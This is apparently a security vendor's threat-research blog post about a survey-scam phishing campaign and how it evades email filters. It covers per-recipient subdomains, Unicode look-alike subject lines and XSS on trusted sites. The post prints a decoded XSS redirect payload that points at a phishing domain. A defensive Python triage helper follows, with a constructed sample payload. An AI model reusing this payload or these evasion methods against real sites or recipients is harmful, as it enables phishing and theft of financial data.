Below is an example of a sophisticated survey scam phishing email that KnowBe4’s Threat Lab team has been monitoring as discussed in “The Hidden Cost of "Free" Gifts: How Survey Scams Are Evolving to Steal Financial Data”.
As discussed in our previous blog, the human element is a critical part of the fake survey scam. However, the campaign's success is largely due to its advanced technical infrastructure. KnowBe4 Threat Lab research has uncovered a sophisticated operation designed to bypass standard security tools such as Secure Email Gateways (SEGs) and other legacy filters. Although it may look like a low-effort phishing campaign, it is a multi-layered attack built for stealth and scale.
Screenshot of a survey scam phishing email impersonating AAA, viewed in the PhishER portal
Dynamic Sender and Subject Evasion
The first challenge cybercriminals have to overcome is the ability of traditional email security tools to identify and block bulk malicious emails: messages that contain previously identified payloads, are sent from known malicious domains, or resemble other phishing emails, for example in their subject line. To defeat this, attackers make each email appear unique.
- Unique subdomains: Each recipient receives an email from a unique subdomain. This prevents security tools from grouping and blocking emails based on a single sender domain.
- Unicode characters: The subject lines are dynamic and use subtle Unicode variations of English letters, which look identical to the naked eye. A subject line like "Your Free Gift" might use a different "o" or "e" character in each email, making it nearly impossible for filters to detect and block based on simple text matching.
Exploiting Vulnerable Websites
The attackers also employ a clever method to bypass domain reputation checks, a common security measure. Instead of hosting their malicious links on a new, suspicious domain, they find and exploit Cross-Site Scripting (XSS) vulnerabilities on legitimate, trusted websites. The initial link in the phishing email directs users to one of these vulnerable sites.
The XSS Payload and Redirection
Once a user clicks the link and lands on the compromised website to undertake the survey, the attack is executed automatically without any further user interaction. The attackers use an XSS exploit based on the HTML <img> element. The link contains a URL-encoded JavaScript payload within the onerror event handler.
Here's a simplified look at the decoded payload:
"><img src="image.jpg" onerror="var url1 = ['http://g','o','o','g','le.com','/','#','f'].join(''); var url2 = ['http://g','o','og','le.c','om','/','#','f'].join('');var url = ['h','ttp','s://ww','w.gr','ech','as.c','om/25','PBN','Z99/7GX','8','N83','N/'].join('');var furl = url + '?' + 'sub1=9&sub2=867-89800&sub3=1265-12423-36636'; furl = furl.replace(/,/g, ''); var win = window.open(furl, '_self'); win.opener = null; win.location.replace(furl);">
This JavaScript code dynamically constructs a new URL and immediately redirects the user to the final phishing page. The attackers use unique IDs and rotate between multiple final destination URLs to avoid being flagged. This technique allows them to leverage the trusted reputation of the vulnerable website to slip past security filters and deliver their payload to the user's browser.
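As an added illustration from the defender's side (not code from the post or from KnowBe4), the helper below decodes a link of the kind described above, flags HTML or event-handler markup in its query string or fragment, and reassembles the join()-built destination so an analyst can see where the redirect actually goes. The landing host, parameter name and payload are constructed assumptions, not values from the campaign.

```python
import re
from urllib.parse import quote, unquote, urlparse

# Constructed sample, not a link from the original post: a trusted site's reflected
# parameter (host and parameter name are assumptions) carrying a URL-encoded
# <img onerror> payload whose target is assembled with Array.join('').
SAMPLE_PAYLOAD = (
    '"><img src="image.jpg" onerror="var url = [\'h\',\'ttps://ww\',\'w.ph\','
    '\'ish.ex\',\'ample/\'].join(\'\');window.location.replace(url);">'
)
SAMPLE_LINK = "https://trusted.example/search?q=" + quote(SAMPLE_PAYLOAD, safe="")

# Markup and script fragments that have no legitimate place in an email link's parameters.
INJECTION_MARKERS = ("<img", "<svg", "onerror=", "onload=", "window.open", "location.replace")
# Matches ['a','b',...].join('') literals so the split-up URL can be put back together.
JOIN_RE = re.compile(r"\[\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\]\s*\.join\(\s*''\s*\)")


def decode_fully(text: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing, so nested encoding is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def recover_joined_urls(script: str) -> list[str]:
    """Reassemble every join('') literal and keep the ones that form an http(s) URL."""
    found = []
    for group in JOIN_RE.findall(script):
        joined = "".join(re.findall(r"'([^']*)'", group))
        if joined.startswith(("http://", "https://")):
            found.append(joined)
    return found


def triage_link(link: str) -> dict:
    """Report whether a link's parameters carry injected markup and where it redirects to."""
    parts = urlparse(link)
    payload = decode_fully(parts.query + " " + parts.fragment)
    lowered = payload.lower()
    markers = [m for m in INJECTION_MARKERS if m in lowered]
    return {
        "landing_host": parts.hostname,   # the legitimate site being abused as a hop
        "injected": bool(markers),
        "markers": markers,
        "destinations": recover_joined_urls(payload),  # decoys and the real target alike
    }
```

Run against a real campaign link, the destinations list will also contain the decoy URLs (such as the google.com entries in the payload above), so every recovered URL should be reviewed rather than only the last one.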
A Continual Threat
The threat actors behind this campaign are constantly adapting. They rotate their themes seasonally and impersonate a variety of trusted brands to increase their chances of success; other examples include phishing emails that impersonate Costco and United Healthcare. Their use of dynamic email content and sophisticated technical evasion techniques shows a level of expertise far beyond the average scammer. It is clear that organizations need to prioritize a dual approach to security to defend against these more sophisticated attacks: more intelligent technical defenses such as KnowBe4 Defend, together with relevant, personal and adaptive coaching that focuses on human behavior rather than tick-box compliance.
For more on the basics behind this campaign, read our companion blog, "The Hidden Cost of 'Free' Gifts."